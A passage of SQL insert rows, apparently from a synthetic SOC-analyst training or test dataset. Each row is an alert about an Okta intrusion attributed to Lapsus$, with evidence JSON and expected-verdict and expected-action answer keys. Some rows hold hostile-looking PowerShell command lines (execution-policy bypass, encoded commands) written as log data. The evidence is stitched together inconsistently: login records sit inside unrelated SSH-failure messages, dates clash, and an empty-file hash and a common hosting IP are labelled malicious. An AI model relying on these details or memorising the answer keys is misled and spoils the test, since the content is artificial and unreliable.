4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(898, 'Suspicious Login from Third-Party Contractor', 'high', 'SIEM logs', 'The attackers exploited compromised credentials from a third-party contractor to enter Okta\'s network, initiating the breach. The login was detected from an unusual IP address not previously associated with the contractor.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"Login\",\"user\":\"jdoe_contractor\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"event_description\":\"Successful login to Okta support system\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"additional_info\":{\"login_method\":\"Password\",\"location\":\"Unusual - Not previously seen\"}}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"jdoe_contractor\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Username associated with third-party contractor account\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address previously associated with unauthorized access attempts\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(899, 'Execution of Unauthorized Scripts', 'high', 'Endpoint detection and response (EDR) tools', 'The Lapsus$ group executed unauthorized scripts on the compromised system, attempting to escalate privileges within the support system. This activity is consistent with their known tactics for gaining higher access.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T09:24:36Z\",\"event_id\":\"EDR-123456\",\"source_ip\":\"185.220.101.1\",\"destination_ip\":\"10.0.0.12\",\"username\":\"jdoe\",\"script_name\":\"escalate_priv.ps1\",\"script_hash\":\"f7d3d9a4c6e8b1ecf3a5d47a5e6f9b3c\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\escalate_priv.ps1\",\"target_system\":\"support-system.local\",\"severity\":\"High\"}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user account\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"escalate_priv.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script used for privilege escalation\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f7d3d9a4c6e8b1ecf3a5d47a5e6f9b3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known 
malicious script\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(900, 'Establishing Permanent Access - Backdoor Deployment', 'critical', 'Network traffic analysis', 'Anomalous network activity detected involving the deployment of backdoors within the compromised network environment. The attackers are setting up persistent access channels to maintain control over the network.', 'Persistence', 'T1059.001 - PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:07Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":443,\"action\":\"Allowed\",\"file_hash\":\"f2a1e2d3c4b5a6f7d8e9c0b1a2d3e4f5\",\"username\":\"jdoe\",\"filename\":\"backdoor.exe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-01-15 00:59:58', '2026-02-16 17:55:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the incident.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a1e2d3c4b5a6f7d8e9c0b1a2d3e4f5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used for persistent access.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Report\",\"verdict\":\"malicious\",\"details\":\"File observed in other APT campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Employee account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(901, 'Lateral Movement Across Okta\'s Systems', 'high', 'Network logs', 'The attackers successfully moved laterally across Okta\'s internal systems, targeting sensitive areas to maximize their data access. This step represents an expert-level operation in which the attacker used stolen credentials to access a critical database server.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.45\",\"src_user\":\"jdoe@okta.com\",\"dst_user\":\"admin@okta.com\",\"action\":\"SSH login\",\"result\":\"success\",\"hash_used\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"sensitive_data_access.sh\"}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetInventory\",\"verdict\":\"internal\",\"details\":\"Internal database server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe@okta.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalUserDB\",\"verdict\":\"suspicious\",\"details\":\"Credentials possibly compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareHashRegistry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(902, 'Exfiltration of Customer Data', 'critical', 'Data loss prevention (DLP) systems', 'Lapsus$ initiated data exfiltration, focusing on information from 366 customers, raising severe supply chain trust concerns.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T15:43:21Z\",\"event_id\":\"EXF12345\",\"source_ip\":\"192.168.45.23\",\"destination_ip\":\"185.199.108.153\",\"user\":\"jdoe\",\"file_name\":\"customer_data_backup.zip\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"exfiltrate\",\"protocol\":\"HTTPS\",\"bytes_transferred\":52428800}', '2026-01-15 00:59:58', '2026-02-16 17:55:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.45.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the exfiltration process.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"customer_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP System\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known data exfiltration tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:31:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:30:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:29:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:28:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(903, 'Supply Chain Trust Implications', 'high', 'Threat intelligence reports', 'The breach\'s aftermath highlighted vulnerabilities in supply chain trust, emphasizing the need for enhanced security measures in identity services. Post-exfiltration analysis indicates potential compromise of identity-as-a-service providers.', 'Post-Exfiltration Analysis', 'T1195.002 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:37Z\",\"event_id\":\"evt-1006\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"user\":\"john_doe\",\"involved_hash\":\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\",\"filename\":\"idp_service_vuln.exe\",\"action\":\"file_exfiltration\",\"status\":\"success\",\"additional_info\":{\"exfiltrated_file_path\":\"/opt/idp_service/idp_service_vuln.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity in recent supply chain attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious file used in identity service breaches.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"idp_service_vuln.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as part of the 
attack vector targeting identity providers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potential victim of credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
